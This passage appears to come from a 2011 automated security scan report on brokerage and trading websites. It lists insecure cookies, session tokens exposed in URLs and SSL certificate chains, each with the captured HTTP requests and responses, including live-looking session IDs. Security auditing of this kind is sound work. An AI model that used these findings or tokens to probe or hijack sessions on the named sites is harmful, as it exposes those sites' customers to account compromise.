Set-Cookie: TLTHID=1B1DD000453D0D2ED80148A6B79D7F5A; Path=/; Domain=.optionsxpress.com
HostName: DAWEB23
Set-Cookie: TLTCNT=DAWEB230000000000085881
Date: Thu, 08 Sep 2011 19:46:54 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.optionsxpress.com/login.asp?r=1">here</a>.</body>

6.53. https://www.pfgboss.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pfgboss.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx HTTP/1.1
Host: www.pfgboss.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Sep 2011 19:47:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Snapsis-PageBlaster: v:2.2.4;c:m;x:+;r:+
Set-Cookie: DotNetNukeAnonymous=ccf6be08-57ee-40a8-b475-8d38a127586f; expires=Thu, 08-Sep-2011 20:07:44 GMT; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 18118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en-US">
<head id="Head"><meta id="MetaCopyright" name="COPYRIGHT" content="Copyright 2010 by PFGBEST" /><meta id="MetaAuth
...[SNIP]...

6.54. https://www.secureclient5.ranweb.com/login/ranweb.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.secureclient5.ranweb.com
Path:   /login/ranweb.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/ranweb.asp?ConfigSelect=5003&run=5003&ranApplication=RANorder&applayoutid=517&DANactionid=661&O_IL=true&O_VR=3 HTTP/1.1
Host: www.secureclient5.ranweb.com
Connection: keep-alive
Referer: https://www.secureclient5.ranweb.com/login/login.asp?firm=eft
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rancookietest=rantestvalue

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ran=%7B84DFE788%2DCFC2%2D4B74%2DA728%2D228B54CE7B57%7D; path=/login
Cache-control: private
Content-Length: 2199

<body><script language='javascript' src='Inquiry.js'></script><script language='javascript' src='KeySupport.js'></script><form name='RANform' method='post' action='ranWeb.asp'><input type='hidden' val
...[SNIP]...

7. Session token in URL  previous  next
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://account.optionsxpress.com/inc/interface.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BA882906446E0B88F4957ABDDD9DED0C; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...
<div id="subdrop1" style="visibility:hidden;position:absolute;"><a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream" target="'+fTarget+'">Streaming</a><a href="/oxnettools/charts/snapcharts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap" class="last" target="'+fTarget+'">Basic</a></div>';
   links[2]='<a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream" target="'+fTarget+'">Streaming</a>';    
   links[3]='<a href="/oxnettools/charts/snapcharts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap" target="'+fTarget+'">Basic</a>
...[SNIP]...
</a>';
   links[10]='<a href="/OXNetAccnt/welcome/risks/margin_guidelines.aspx?SESSIONID=' + s + '&ticker=' + symbol + '" target="'+fTarget+'">Margin</a>
...[SNIP]...
<div id="subdrop1" style="visibility:hidden;position:absolute;"><a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream">Streaming</a><a href="/oxnettools/charts/snapcharts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap" class="last">Basic</a></div>';
   links[20]='<a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream">Streaming</a>';
   links[21]='<a href="/oxnettools/charts/snapcharts.aspx.asp?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=snap">Basic</a>
...[SNIP]...
</a>';
   links[23]='<a href="/OXNetAccnt/welcome/risks/margin_guidelines.aspx?SESSIONID=' + s + '&ticker=' + symbol + '">Margin</a>
...[SNIP]...
<div id="quoteFrameMoreMenu">'+links[8];
           //rowName[1]=links[38];
           rowName[1]='<a href="/OXNetTools/Charts/charts.aspx?SESSIONID=' + s + '&SYMBOL=' + symbol + '&SnapJava=stream" target="'+fTarget+'">Streaming Charts</a>
...[SNIP]...

7.2. https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cwt1.interactivebrokers.com
Path:   /MT3G/servlet/LoginS

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /MT3G/servlet/LoginS;jsessionid=758F62D39C87C4B1FF77534538503C91.cwt2?factor=338946663 HTTP/1.1
Host: cwt1.interactivebrokers.com
Connection: keep-alive
Referer: https://cwt1.interactivebrokers.com/MT3G/servlet/LoginS
Content-Length: 26
Cache-Control: max-age=0
Origin: https://cwt1.interactivebrokers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=758F62D39C87C4B1FF77534538503C91.cwt2; ib=googlead; web=1059282; XYZAB_AM.LOGIN=; XYZAB=; URL_PARAM=actiongetProps=getProps&language=en&propFile=SSO_Login_v1

user_name=xss&password=xss

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:33 GMT
Server: apache
Set-Cookie: JSESSIONID=8846F36EE6A06B019614B0FEA9754790.cwt2; Path=/MT3G; Secure; HTTPOnly
Content-Length: 1010
Connection: close
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="../include/MT3G.css" />
<meta http-equiv="Cache-Control" content="max-age=0" />
<title>Inte
...[SNIP]...

7.3. http://optionsxpress.tt.omtrdc.net/m2/optionsxpress/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://optionsxpress.tt.omtrdc.net
Path:   /m2/optionsxpress/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/optionsxpress/mbox/standard?mboxHost=www.optionsxpress.com&mboxSession=1315527919598-875378&mboxPage=1315527919598-875378&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=984&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=ox_lp_options_global&mboxId=0&mboxTime=1315509919623&mboxURL=http%3A%2F%2Fwww.optionsxpress.com%2Fpromos%2Fexperience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007%26ef_id%3DzqROZUBXyFQAAIdR%3A20110908192437%3As&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dfutures%2Btrading&mboxVersion=39 HTTP/1.1
Host: optionsxpress.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 15627
Date: Thu, 08 Sep 2011 19:24:42 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('ox_lp_options_global',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-def
...[SNIP]...

7.4. https://www.interactivebrokers.com/Universal/servlet/AccountAccess.Logout  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /Universal/servlet/AccountAccess.Logout

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /Universal/servlet/AccountAccess.Logout;jsessionid=54D71E83ABB03FD58EA41BA2BB7B8355.www3 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 08 Sep 2011 19:49:02 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C60781F9AA7215C818780FF42B0C3387.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=867E3A2969A1B7AC4B17AEA673304A9C.www3; Path=/Universal; Secure
Set-Cookie: JSESSIONID=46BC11DD415F2D363F6025F219DE210D.www3; Path=/Universal; Secure
Content-Language: en
Content-Length: 16504
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...

7.5. https://www.interactivebrokers.com/cstools/ib_app_help/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /cstools/ib_app_help/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /cstools/ib_app_help/;jsessionid=54D71E83ABB03FD58EA41BA2BB7B8355.www3?UserName=&AccountNo=&taxId=&lang=en&source=APP&context=&priority=&location=PRE_REG:1000&custType= HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 08 Sep 2011 19:49:04 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 35821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Interact
...[SNIP]...

8. SSL certificate  previous  next
There are 23 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



8.1. https://cwt1.interactivebrokers.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://cwt1.interactivebrokers.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.interactivebrokers.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon May 24 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 30 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

8.2. https://www.barchart.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.barchart.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.barchart.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Tue Dec 15 18:00:00 GMT-06:00 2009
Valid to:  Mon Feb 10 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 02:09:10 GMT-06:00 2005
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #2

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 18:00:00 GMT-06:00 2006
Valid to:  Sat May 30 04:48:38 GMT-06:00 2020

Certificate chain #3

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:  Tue Jul 09 12:19:22 GMT-06:00 2019

8.3. https://www.cqgtrader.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.cqgtrader.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  www.cqgtrader.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Fri Mar 25 18:00:00 GMT-06:00 2011
Valid to:  Sun Mar 25 17:59:59 GMT-06:00 2012

8.4. https://www.efutures.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.efutures.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  www.efutures.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Fri Jun 24 18:00:00 GMT-06:00 2011
Valid to:  Sat Jul 21 17:59:59 GMT-06:00 2012

8.5. https://www.interactivebrokers.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.interactivebrokers.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.interactivebrokers.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon May 24 18:00:00 GMT-06:00 2010
Valid to:  Tue Jul 30 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #4

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

8.6. https://account.optionsxpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.com
Issued by:  Thawte SSL CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Mon Sep 03 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

Certificate chain #3

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.7. https://adwords.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  adwords.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:49 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:49 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.8. https://docs.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.google.com
Issued by:  Google Internet Authority
Valid from:  Thu Aug 11 21:49:02 GMT-06:00 2011
Valid to:  Sat Aug 11 21:59:02 GMT-06:00 2012

Certificate chain #1

Issued to:  Google Internet Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 08 14:43:27 GMT-06:00 2009
Valid to:  Fri Jun 07 13:43:27 GMT-06:00 2013

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.9. https://icewebinar.webex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icewebinar.webex.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.webex.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue Jun 21 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.10. https://interactivebrokers.webex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://interactivebrokers.webex.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.webex.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue Jun 21 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.11. https://mail.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.google.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.google.com
Issued by:  Thawte SGC CA
Valid from:  Thu Dec 17 18:00:00 GMT-06:00 2009
Valid to:  Sun Dec 18 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  Thawte SGC CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed May 12 18:00:00 GMT-06:00 2004
Valid to:  Mon May 12 17:59:59 GMT-06:00 2014

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.12. https://online.optionsxpress.ca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.optionsxpress.ca
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.ca
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Nov 24 14:20:38 GMT-06:00 2010
Valid to:  Tue Nov 26 15:45:36 GMT-06:00 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.13. https://online.optionsxpress.com.sg/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.optionsxpress.com.sg
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.com.sg
Issued by:  RapidSSL CA
Valid from:  Thu Jan 27 08:18:31 GMT-06:00 2011
Valid to:  Tue Jan 29 08:29:11 GMT-06:00 2013

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 GMT-06:00 2010
Valid to:  Tue Feb 18 16:45:05 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

Certificate chain #3

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

8.14. https://online.optionsxpress.eu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.optionsxpress.eu
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.eu
Issued by:  RapidSSL CA
Valid from:  Wed Feb 23 04:17:40 GMT-06:00 2011
Valid to:  Tue Feb 25 05:17:40 GMT-06:00 2014

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 GMT-06:00 2010
Valid to:  Tue Feb 18 16:45:05 GMT-06:00 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

Certificate chain #3

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 22:00:00 GMT-06:00 2002
Valid to:  Fri May 20 22:00:00 GMT-06:00 2022

8.15. https://onlineint.optionsxpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineint.optionsxpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.optionsxpress.com
Issued by:  Thawte SSL CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Mon Sep 03 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 GMT-06:00 2006
Valid to:  Wed Dec 30 17:59:59 GMT-06:00 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 18:00:00 GMT-06:00 1996
Valid to:  Fri Jan 01 17:59:59 GMT-06:00 2021

8.16. https://seal.verisign.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 18:00:00 GMT-06:00 2010
Valid to:  Sun Jul 06 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

